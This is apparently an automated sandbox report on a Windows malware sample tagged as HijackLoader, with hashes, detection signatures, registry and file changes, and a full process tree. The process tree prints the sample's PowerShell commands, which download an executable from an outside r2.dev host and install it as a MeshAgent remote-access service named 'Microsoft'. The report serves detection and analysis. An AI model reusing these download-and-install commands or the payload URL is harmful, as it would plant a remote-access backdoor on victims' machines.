Analysis
-
max time kernel: 149s
max time network: 142s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 12-10-2024 07:04
Static task: static1
Behavioral task: behavioral1
Sample: 2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe
Resource: win7-20240903-en
General
-
Target: 2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe
Size: 10.1MB
MD5: 8fd2994edebc3a3ddde2a14b3f5c4183
SHA1: 51b0c1f0e5d9a1486ee49bf25e544e626a5c86c0
SHA256: c4c71ad59b09f47d5d8c1f1ba54a358d1793706f00651867fb171e8f4d2912b4
SHA512: 62620e6d802471ae663c89916f12fd3b68931cb141d80dc2444129f2d1b3f56a9a1630028d18ea08c6c8a595538bf114d24cb56269812f8bfd3c06c3ec1464eb
SSDEEP: 196608:9RFHibb0Dpz7Omna1cCwvylAjWZ0Xq9YLuxMfCVb2XGh22KNL7P+wherA+O7f:tibgDpz7TnaqtvylAjWZ0Xq9YLuxMfC4
Malware Config
Signatures
-
Detects MeshAgent payload (5 IoCs)
Processes:
resource | yara_rule
behavioral2/memory/668-85-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp | family_meshagent
behavioral2/memory/3284-87-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp | family_meshagent
behavioral2/memory/668-122-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp | family_meshagent
behavioral2/memory/668-123-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp | family_meshagent
behavioral2/memory/668-134-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp | family_meshagent
-
Blocklisted process makes network request (3 IoCs)
Processes:
flow | pid | process
2 | 3636 | powershell.exe
19 | 2368 | powershell.exe
21 | 3176 | powershell.exe
-
Processes:
pid | process
376 | powershell.exe
1480 | powershell.exe
1536 | powershell.exe
764 | powershell.exe
2368 | powershell.exe
3176 | powershell.exe
-
Downloads MZ/PE file
-
Sets service image path in registry (2 TTPs, 1 IoCs)
Processes:
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Microsoft\ImagePath = "\"C:\\Users\\Admin\\AppData\\local\\svchost\\svchost.exe\" --meshServiceName=\"Microsoft\"" | svchost.exe
-
Executes dropped EXE (3 IoCs)
Processes:
pid | process
60 | _가이아서버 접속기.exe
3284 | svchost.exe
668 | svchost.exe
-
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory (64 IoCs)
Processes:
description | ioc | process
File opened for modification | C:\Windows\System32\combase.pdb | svchost.exe
File opened for modification | C:\Windows\System32\dll\ws2_32.pdb | svchost.exe
File opened for modification | C:\Windows\System32\dll\bcryptprimitives.pdb | svchost.exe
File opened for modification | C:\Windows\System32\kernelbase.pdb | svchost.exe
File opened for modification | C:\Windows\System32\symbols\dll\crypt32.pdb | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\6F20C0854D11B015FEDD40C59EF0A2A2E0285DD3 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys | svchost.exe
File opened for modification | C:\Windows\System32\symbols\dll\advapi32.pdb | svchost.exe
File opened for modification | C:\Windows\System32\win32u.pdb | svchost.exe
File opened for modification | C:\Windows\System32\ole32.pdb | svchost.exe
File opened for modification | C:\Windows\System32\bcrypt.pdb | svchost.exe
File opened for modification | C:\Windows\System32\Kernel.Appcore.pdb | svchost.exe
File opened for modification | C:\Windows\System32\dll\Kernel.Appcore.pdb | svchost.exe
File opened for modification | C:\Windows\System32\symbols\exe\svchost.pdb | svchost.exe
File opened for modification | C:\Windows\System32\symbols\dll\ntdll.pdb | svchost.exe
File opened for modification | C:\Windows\System32\symbols\dll\kernelbase.pdb | svchost.exe
File opened for modification | C:\Windows\System32\advapi32.pdb | svchost.exe
File opened for modification | C:\Windows\System32\dll\advapi32.pdb | svchost.exe
File opened for modification | C:\Windows\System32\symbols\dll\rpcrt4.pdb | svchost.exe
File opened for modification | C:\Windows\System32\crypt32.pdb | svchost.exe
File opened for modification | C:\Windows\System32\symbols\dll\combase.pdb | svchost.exe
File opened for modification | C:\Windows\System32\svchost.pdb | svchost.exe
File opened for modification | C:\Windows\System32\kernel32.pdb | svchost.exe
File opened for modification | C:\Windows\System32\DLL\iphlpapi.pdb | svchost.exe
File opened for modification | C:\Windows\System32\DLL\bcrypt.pdb | svchost.exe
File opened for modification | C:\Windows\System32\shcore.pdb | svchost.exe
File opened for modification | C:\Windows\System32\symbols\dll\shcore.pdb | svchost.exe
File opened for modification | C:\Windows\System32\dll\shell32.pdb | svchost.exe
File opened for modification | C:\Windows\System32\iphlpapi.pdb | svchost.exe
File opened for modification | C:\Windows\System32\rpcrt4.pdb | svchost.exe
File opened for modification | C:\Windows\System32\dll\crypt32.pdb | svchost.exe
File opened for modification | C:\Windows\System32\shell32.pdb | svchost.exe
File opened for modification | C:\Windows\System32\gdiplus.pdb | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\622B9A99354424DAA4C2EB7967BD870CBE07C969 | svchost.exe
File opened for modification | C:\Windows\System32\ntdll.pdb | svchost.exe
File opened for modification | C:\Windows\System32\dll\kernelbase.pdb | svchost.exe
File opened for modification | C:\Windows\System32\symbols\dll\shell32.pdb | svchost.exe
File opened for modification | C:\Windows\System32\msvcrt.pdb | svchost.exe
File opened for modification | C:\Windows\System32\dll\gdi32full.pdb | svchost.exe
File opened for modification | C:\Windows\System32\symbols\dll\win32u.pdb | svchost.exe
File opened for modification | C:\Windows\System32\dbghelp.pdb | svchost.exe
File opened for modification | C:\Windows\System32\ncrypt.pdb | svchost.exe
File opened for modification | C:\Windows\System32\DLL\dbgcore.pdb | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\AD743BF6CD010272FEF925B0B1EE6A8A05B70C73 | svchost.exe
File opened for modification | C:\Windows\System32\sechost.pdb | svchost.exe
File opened for modification | C:\Windows\System32\ucrtbase.pdb | svchost.exe
File opened for modification | C:\Windows\System32\dll\comctl32.pdb | svchost.exe
File opened for modification | C:\Windows\System32\symbols\dll\dbghelp.pdb | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\622B9A99354424DAA4C2EB7967BD870CBE07C969 | svchost.exe
File opened for modification | C:\Windows\System32\symbols\dll\msvcrt.pdb | svchost.exe
File opened for modification | C:\Windows\System32\symbols\dll\user32.pdb | svchost.exe
File opened for modification | C:\Windows\System32\dll\combase.pdb | svchost.exe
File opened for modification | C:\Windows\System32\dll\dbghelp.pdb | svchost.exe
File opened for modification | C:\Windows\System32\dll\gdiplus.pdb | svchost.exe
File opened for modification | C:\Windows\System32\dll\ntasn1.pdb | svchost.exe
File opened for modification | C:\Windows\System32\dll\sechost.pdb | svchost.exe
File opened for modification | C:\Windows\System32\symbols\dll\msvcp_win.pdb | svchost.exe
File opened for modification | C:\Windows\System32\symbols\dll\gdi32.pdb | svchost.exe
File opened for modification | C:\Windows\System32\dll\msvcp_win.pdb | svchost.exe
File opened for modification | C:\Windows\System32\symbols\dll\ole32.pdb | svchost.exe
File opened for modification | C:\Windows\System32\symbols\dll\Kernel.Appcore.pdb | svchost.exe
File opened for modification | C:\Windows\System32\dll\ucrtbase.pdb | svchost.exe
File opened for modification | C:\Windows\System32\dll\gdi32.pdb | svchost.exe
File opened for modification | C:\Windows\System32\dll\ole32.pdb | svchost.exe
-
Processes:
resource | yara_rule
C:\Users\Admin\AppData\local\svchost\svchost.exe | upx
behavioral2/memory/3284-81-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp | upx
behavioral2/memory/668-85-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp | upx
behavioral2/memory/3284-87-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp | upx
behavioral2/memory/668-122-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp | upx
behavioral2/memory/668-123-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp | upx
behavioral2/memory/668-134-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp | upx
-
Program crash (1 IoCs)
Processes:
pid | pid_target | process | target process
4296 | 60 | WerFault.exe | _가이아서버 접속기.exe
-
System Location Discovery: System Language Discovery (1 TTPs, 1 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | _가이아서버 접속기.exe
-
Modifies data under HKEY_USERS (52 IoCs)
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | svchost.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133731902928711239" | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
-
Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes:
pid | process
3636 | powershell.exe
3636 | powershell.exe
764 | powershell.exe
764 | powershell.exe
376 | powershell.exe
376 | powershell.exe
2368 | powershell.exe
2368 | powershell.exe
3176 | powershell.exe
3176 | powershell.exe
1480 | powershell.exe
1480 | powershell.exe
1536 | powershell.exe
1536 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes:
description | pid | process
Token: SeDebugPrivilege | 3636 | powershell.exe
Token: SeDebugPrivilege | 764 | powershell.exe
Token: SeDebugPrivilege | 376 | powershell.exe
Token: SeDebugPrivilege | 2368 | powershell.exe
Token: SeDebugPrivilege | 3176 | powershell.exe
Token: SeDebugPrivilege | 1480 | powershell.exe
Token: SeAssignPrimaryTokenPrivilege | 4340 | wmic.exe
Token: SeIncreaseQuotaPrivilege | 4340 | wmic.exe
Token: SeSecurityPrivilege | 4340 | wmic.exe
Token: SeTakeOwnershipPrivilege | 4340 | wmic.exe
Token: SeLoadDriverPrivilege | 4340 | wmic.exe
Token: SeSystemtimePrivilege | 4340 | wmic.exe
Token: SeBackupPrivilege | 4340 | wmic.exe
Token: SeRestorePrivilege | 4340 | wmic.exe
Token: SeShutdownPrivilege | 4340 | wmic.exe
Token: SeSystemEnvironmentPrivilege | 4340 | wmic.exe
Token: SeUndockPrivilege | 4340 | wmic.exe
Token: SeManageVolumePrivilege | 4340 | wmic.exe
Token: SeAssignPrimaryTokenPrivilege | 4340 | wmic.exe
Token: SeIncreaseQuotaPrivilege | 4340 | wmic.exe
Token: SeSecurityPrivilege | 4340 | wmic.exe
Token: SeTakeOwnershipPrivilege | 4340 | wmic.exe
Token: SeLoadDriverPrivilege | 4340 | wmic.exe
Token: SeSystemtimePrivilege | 4340 | wmic.exe
Token: SeBackupPrivilege | 4340 | wmic.exe
Token: SeRestorePrivilege | 4340 | wmic.exe
Token: SeShutdownPrivilege | 4340 | wmic.exe
Token: SeSystemEnvironmentPrivilege | 4340 | wmic.exe
Token: SeUndockPrivilege | 4340 | wmic.exe
Token: SeManageVolumePrivilege | 4340 | wmic.exe
Token: SeAssignPrimaryTokenPrivilege | 4972 | wmic.exe
Token: SeIncreaseQuotaPrivilege | 4972 | wmic.exe
Token: SeSecurityPrivilege | 4972 | wmic.exe
Token: SeTakeOwnershipPrivilege | 4972 | wmic.exe
Token: SeLoadDriverPrivilege | 4972 | wmic.exe
Token: SeSystemtimePrivilege | 4972 | wmic.exe
Token: SeBackupPrivilege | 4972 | wmic.exe
Token: SeRestorePrivilege | 4972 | wmic.exe
Token: SeShutdownPrivilege | 4972 | wmic.exe
Token: SeSystemEnvironmentPrivilege | 4972 | wmic.exe
Token: SeUndockPrivilege | 4972 | wmic.exe
Token: SeManageVolumePrivilege | 4972 | wmic.exe
Token: SeAssignPrimaryTokenPrivilege | 4972 | wmic.exe
Token: SeIncreaseQuotaPrivilege | 4972 | wmic.exe
Token: SeSecurityPrivilege | 4972 | wmic.exe
Token: SeTakeOwnershipPrivilege | 4972 | wmic.exe
Token: SeLoadDriverPrivilege | 4972 | wmic.exe
Token: SeSystemtimePrivilege | 4972 | wmic.exe
Token: SeBackupPrivilege | 4972 | wmic.exe
Token: SeRestorePrivilege | 4972 | wmic.exe
Token: SeShutdownPrivilege | 4972 | wmic.exe
Token: SeSystemEnvironmentPrivilege | 4972 | wmic.exe
Token: SeUndockPrivilege | 4972 | wmic.exe
Token: SeManageVolumePrivilege | 4972 | wmic.exe
Token: SeAssignPrimaryTokenPrivilege | 4292 | wmic.exe
Token: SeIncreaseQuotaPrivilege | 4292 | wmic.exe
Token: SeSecurityPrivilege | 4292 | wmic.exe
Token: SeTakeOwnershipPrivilege | 4292 | wmic.exe
Token: SeLoadDriverPrivilege | 4292 | wmic.exe
Token: SeSystemtimePrivilege | 4292 | wmic.exe
Token: SeBackupPrivilege | 4292 | wmic.exe
Token: SeRestorePrivilege | 4292 | wmic.exe
Token: SeShutdownPrivilege | 4292 | wmic.exe
Token: SeSystemEnvironmentPrivilege | 4292 | wmic.exe
-
Suspicious use of WriteProcessMemory (35 IoCs)
Processes:
description | pid | process | target process
PID 4588 wrote to memory of 3636 | 4588 | 2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe | powershell.exe
PID 4588 wrote to memory of 3636 | 4588 | 2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe | powershell.exe
PID 4588 wrote to memory of 4564 | 4588 | 2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe | cmd.exe
PID 4588 wrote to memory of 4564 | 4588 | 2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe | cmd.exe
PID 4564 wrote to memory of 3564 | 4564 | cmd.exe | explorer.exe
PID 4564 wrote to memory of 3564 | 4564 | cmd.exe | explorer.exe
PID 3636 wrote to memory of 764 | 3636 | powershell.exe | powershell.exe
PID 3636 wrote to memory of 764 | 3636 | powershell.exe | powershell.exe
PID 3388 wrote to memory of 60 | 3388 | explorer.exe | _가이아서버 접속기.exe
PID 3388 wrote to memory of 60 | 3388 | explorer.exe | _가이아서버 접속기.exe
PID 3388 wrote to memory of 60 | 3388 | explorer.exe | _가이아서버 접속기.exe
PID 3636 wrote to memory of 376 | 3636 | powershell.exe | powershell.exe
PID 3636 wrote to memory of 376 | 3636 | powershell.exe | powershell.exe
PID 3636 wrote to memory of 2368 | 3636 | powershell.exe | powershell.exe
PID 3636 wrote to memory of 2368 | 3636 | powershell.exe | powershell.exe
PID 3636 wrote to memory of 3176 | 3636 | powershell.exe | powershell.exe
PID 3636 wrote to memory of 3176 | 3636 | powershell.exe | powershell.exe
PID 3636 wrote to memory of 1480 | 3636 | powershell.exe | powershell.exe
PID 3636 wrote to memory of 1480 | 3636 | powershell.exe | powershell.exe
PID 1480 wrote to memory of 3284 | 1480 | powershell.exe | svchost.exe
PID 1480 wrote to memory of 3284 | 1480 | powershell.exe | svchost.exe
PID 668 wrote to memory of 4340 | 668 | svchost.exe | wmic.exe
PID 668 wrote to memory of 4340 | 668 | svchost.exe | wmic.exe
PID 668 wrote to memory of 4972 | 668 | svchost.exe | wmic.exe
PID 668 wrote to memory of 4972 | 668 | svchost.exe | wmic.exe
PID 668 wrote to memory of 4292 | 668 | svchost.exe | wmic.exe
PID 668 wrote to memory of 4292 | 668 | svchost.exe | wmic.exe
PID 668 wrote to memory of 4968 | 668 | svchost.exe | wmic.exe
PID 668 wrote to memory of 4968 | 668 | svchost.exe | wmic.exe
PID 668 wrote to memory of 1452 | 668 | svchost.exe | wmic.exe
PID 668 wrote to memory of 1452 | 668 | svchost.exe | wmic.exe
PID 668 wrote to memory of 4872 | 668 | svchost.exe | wmic.exe
PID 668 wrote to memory of 4872 | 668 | svchost.exe | wmic.exe
PID 668 wrote to memory of 1536 | 668 | svchost.exe | powershell.exe
PID 668 wrote to memory of 1536 | 668 | svchost.exe | powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe"
  - Suspicious use of WriteProcessMemory
  PID:4588
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID:3636
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "New-Item -ItemType Directory -Force -Path C:\Users\Admin\AppData\local\svchost"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID:764
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "C:\Users\Admin\AppData\local\svchost\svchost.exe -uninstall"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID:376
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest https://pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev/svchost.exe -OutFile C:\Users\Admin\AppData\local\svchost\svchost.exe"
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID:2368
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest https://pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev/svchost.msh -OutFile C:\Users\Admin\AppData\local\svchost\svchost.msh"
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID:3176
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "C:\Users\Admin\AppData\local\svchost\svchost.exe -install"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          PID:1480
            C:\Users\Admin\AppData\local\svchost\svchost.exe
              Command line: "C:\Users\Admin\AppData\local\svchost\svchost.exe" -install
              - Sets service image path in registry
              - Executes dropped EXE
              PID:3284
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c explorer.exe "_가이아서버 접속기.exe"
      - Suspicious use of WriteProcessMemory
      PID:4564
        C:\Windows\explorer.exe
          Command line: explorer.exe "_가이아서버 접속기.exe"
          PID:3564
-
C:\Windows\explorer.exe
  Command line: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
  - Suspicious use of WriteProcessMemory
  PID:3388
    C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      PID:60
        C:\Windows\SysWOW64\WerFault.exe
          Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 60 -s 420
          - Program crash
          PID:4296
-
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 60 -ip 60
  PID:4580
-
C:\Users\Admin\AppData\local\svchost\svchost.exe
  Command line: "C:\Users\Admin\AppData\local\svchost\svchost.exe" --meshServiceName="Microsoft"
  - Executes dropped EXE
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of WriteProcessMemory
  PID:668
    C:\Windows\System32\wbem\wmic.exe
      Command line: wmic SystemEnclosure get ChassisTypes
      - Suspicious use of AdjustPrivilegeToken
      PID:4340
    C:\Windows\system32\wbem\wmic.exe
      Command line: wmic os get oslanguage /FORMAT:LIST
      - Suspicious use of AdjustPrivilegeToken
      PID:4972
    C:\Windows\System32\wbem\wmic.exe
      Command line: wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      - Suspicious use of AdjustPrivilegeToken
      PID:4292
    C:\Windows\system32\wbem\wmic.exe
      Command line: wmic os get oslanguage /FORMAT:LIST
      PID:4968
    C:\Windows\System32\wbem\wmic.exe
      Command line: wmic SystemEnclosure get ChassisTypes
      PID:1452
    C:\Windows\System32\wbem\wmic.exe
      Command line: wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      PID:4872
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -noprofile -nologo -command -
      - Command and Scripting Interpreter: PowerShell
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:1536
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize: 2KB
MD5: 6cf293cb4d80be23433eecf74ddb5503
SHA1: 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256: b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512: 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize: 64B
MD5: 1a11402783a8686e08f8fa987dd07bca
SHA1: 580df3865059f4e2d8be10644590317336d146ce
SHA256: 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA512: 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510
-
Filesize: 944B
MD5: 96ff1ee586a153b4e7ce8661cabc0442
SHA1: 140d4ff1840cb40601489f3826954386af612136
SHA256: 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA512: 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569
-
Filesize: 1KB
MD5: e5063fb2c6625068c1224c68b5c1ce46
SHA1: 8867a7637689af271e445a7379c810335591e708
SHA256: 2bfdeab5f252777c7bbbb7b8b033e03e37d3e2061dce73c8af03c196e1b26bfe
SHA512: ad62e5268c8fe5b7b72d40d8724ab7ae2fa3d3e910122ad36f61e6c1ec81c22e1ef3b4477006085212b20342aa073ee2275e0095e92c4ac350df6814149aca58
-
Filesize: 1KB
MD5: 8a12c129e02e3d0e0ff14020158d6e53
SHA1: 383434d0df826622f06b1f3811124782df21507b
SHA256: e0c11799edb944329f9ec85fd54a7038ea7df63d6a07162bc36fc03edb1bceb7
